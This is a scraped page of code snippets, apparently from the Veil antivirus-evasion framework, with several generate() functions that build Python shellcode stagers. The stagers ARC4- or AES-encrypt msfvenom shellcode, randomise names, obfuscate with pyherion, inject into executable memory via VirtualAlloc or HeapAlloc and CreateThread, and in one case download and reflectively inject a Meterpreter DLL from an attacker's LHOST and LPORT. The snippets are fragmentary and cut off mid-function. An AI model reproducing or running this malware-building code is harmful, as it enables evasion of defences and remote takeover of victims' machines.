payloadCode += "\tif %s.status == 200: return %s.read()\n" %(responseName, responseName)
payloadCode += "\telse: return \"\"\n"
# method to inject a reflective .dll into memory
payloadCode += "def %s(%s):\n" %(injectMethodName, dataName)
payloadCode += "\tif %s != \"\":\n" %(dataName)
payloadCode += "\t\t%s = bytearray(%s)\n" %(byteArrayName, dataName)
payloadCode += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)), ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(ptrName, byteArrayName)
payloadCode += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(bufName, byteArrayName, byteArrayName)
payloadCode += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s),%s, ctypes.c_int(len(%s)))\n" %(ptrName, bufName, byteArrayName)
payloadCode += "\t\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(handleName, ptrName)
payloadCode += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" %(handleName)
# download the metpreter .dll and inject it
payloadCode += "%s = ''\n" %(data2Name)
payloadCode += "%s = %s(\"%s\", %s)\n" %(data2Name, downloadMethodName, self.required_options["LHOST"][0], self.required_options["LPORT"][0])
payloadCode += "%s(%s)\n" %(injectMethodName, data2Name)
if self.required_options["use_pyherion"][0].lower() == "y":
payloadCode = encryption.pyherion(payloadCode)
return payloadCode示例12: generate
def generate(self):
if self.required_options["inject_method"][0].lower() == "virtual":
if self.required_options["expire_payload"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandARCKey = helpers.randomString()
RandARCPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (ARCKey, iv) ) = encryption.encryptARC(Shellcode)
PayloadCode = 'from Crypto.Cipher import ARC4\n'
PayloadCode += 'import ctypes\n'
PayloadCode += RandIV + ' = \'' + iv + '\'\n'
PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandARCKey = helpers.randomString()
RandARCPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (ARCKey, iv) ) = encryption.encryptARC(Shellcode)
PayloadCode = 'from Crypto.Cipher import ARC4\n'
PayloadCode += 'import ctypes\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
PayloadCode += '\t' + RandARCKey + ' = \'' + ARCKey + '\'\n'
PayloadCode += '\t' + RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
if self.required_options["expire_payload"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandARCKey = helpers.randomString()
RandARCPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
#.........这里部分代码省略.........
示例13: generate
#.........这里部分代码省略.........
# replace the URL/port of the handler
urlIndex = meterpreterDll.index("https://" + ("X" * 256))
urlString = (
"http://"
+ self.required_options["LHOST"][0]
+ ":"
+ str(self.required_options["LPORT"][0])
+ "/"
+ self.genHTTPChecksum()
+ "_"
+ helpers.randomString(16)
+ "/\x00"
)
meterpreterDll = dllReplace(meterpreterDll, urlIndex, urlString)
# replace the expiration timeout with the default value of 300
expirationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xB64BE661))
expirationTimeout = struct.pack("<I", 604800)
meterpreterDll = dllReplace(meterpreterDll, expirationTimeoutIndex, expirationTimeout)
# replace the communication timeout with the default value of 300
communicationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xAF79257F))
communicationTimeout = struct.pack("<I", 300)
meterpreterDll = dllReplace(meterpreterDll, communicationTimeoutIndex, communicationTimeout)
# compress/base64 encode the dll
compressedDll = helpers.deflate(meterpreterDll)
# actually build out the payload
payloadCode = ""
# traditional void pointer injection
if self.required_options["inject_method"][0].lower() == "void":
# doing void * cast
payloadCode += "from ctypes import *\nimport base64,zlib\n"
randInflateFuncName = helpers.randomString()
randb64stringName = helpers.randomString()
randVarName = helpers.randomString()
# deflate function
payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n"
payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n"
randVarName = helpers.randomString()
randFuncName = helpers.randomString()
payloadCode += randVarName + " = " + randInflateFuncName + '("' + compressedDll + '")\n'
payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
payloadCode += randFuncName + "()\n"
# VirtualAlloc() injection
else:
payloadCode += "import ctypes,base64,zlib\n"
randInflateFuncName = helpers.randomString()
randb64stringName = helpers.randomString()
randVarName = helpers.randomString()
randPtr = helpers.randomString()
randBuf = helpers.randomString()
randHt = helpers.randomString()
# deflate function
payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n"
payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n"
payloadCode += randVarName + " = bytearray(" + randInflateFuncName + '("' + compressedDll + '"))\n'
payloadCode += (
randPtr
+ " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len("
+ randVarName
+ ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n"
)
payloadCode += randBuf + " = (ctypes.c_char * len(" + randVarName + ")).from_buffer(" + randVarName + ")\n"
payloadCode += (
"ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int("
+ randPtr
+ "),"
+ randBuf
+ ",ctypes.c_int(len("
+ randVarName
+ ")))\n"
)
payloadCode += (
randHt
+ " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int("
+ randPtr
+ "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n"
)
payloadCode += "ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + randHt + "),ctypes.c_int(-1))\n"
if self.required_options["use_pyherion"][0].lower() == "y":
payloadCode = encryption.pyherion(payloadCode)
return payloadCode示例14: generate
def generate(self):
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
randctypes = helpers.randomString()
# Create Payload code
PayloadCode = ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n'
PayloadCode += 'import ctypes as ' + randctypes + '\n'
PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
randctypes = helpers.randomString()
# Create Payload code
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n'
PayloadCode += '\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
PayloadCode += '\t' + RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
if self.required_options["INJECT_METHOD"][0].lower() == "heap":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
HeapVar = helpers.randomString()
randctypes = helpers.randomString()
# Create Payload code
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n'
PayloadCode += HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
#.........这里部分代码省略.........
示例15: generate
#.........这里部分代码省略.........
# Open Target Server with HTTP GET request
PayloadCode += ' ' + RandResponse + '= urlopen('+ RandKeyServer +') \n'
# Check to see if server returns a 200 code or if not its most likely a 400 code
PayloadCode += ' if ' + RandResponse + '.code == 200:\n'
# Opening and requesting HTML from Target Server
PayloadCode += ' '+ RandHttpKey + ' = urlopen('+ RandKeyServer +').read()\n'
PayloadCode += ' '+ RandMD5 +' = md5.new()\n'
PayloadCode += ' '+ RandHttpKey + ' = str(' + RandHttpKey + ')\n'
# Genrate MD5 hash of HTML on page
PayloadCode += ' '+ RandMD5 +'.update('+ RandHttpKey +')\n'
# Convert to 16 Byte Hex for AES functions
PayloadCode += ' '+ RandHttpKey + ' = '+ RandMD5 +'.hexdigest()\n'
# Convert to String for functions
PayloadCode += ' '+ RandHttpKey + ' = str('+ RandHttpKey +')\n'
# Break out to decryption
PayloadCode += ' break\n'
# At any point it fails you will be in sleep for supplied time
PayloadCode += ' except URLError, e:\n'
PayloadCode += ' time.sleep('+ self.required_options["SLEEP_TIME"][0] +')\n'
PayloadCode += ' pass\n'
# Execute Shellcode inject
PayloadCode += RandPadding + ' = \'{\'\n'
PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += RandCipherObject + ' = AES.new('+ RandHttpKey +')\n'
PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0])
target_html_file = str(TARGET_SERVER.split('/')[-1])
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
HeapVar = helpers.randomString()
# Define Random Variable Names for HTTP functions
RandResponse = helpers.randomString()
RandHttpKey = helpers.randomString()
RandMD5 = helpers.randomString()
RandKeyServer = helpers.randomString()
RandSleep = helpers.randomString()
# Define Random Variable Names for HTML Functions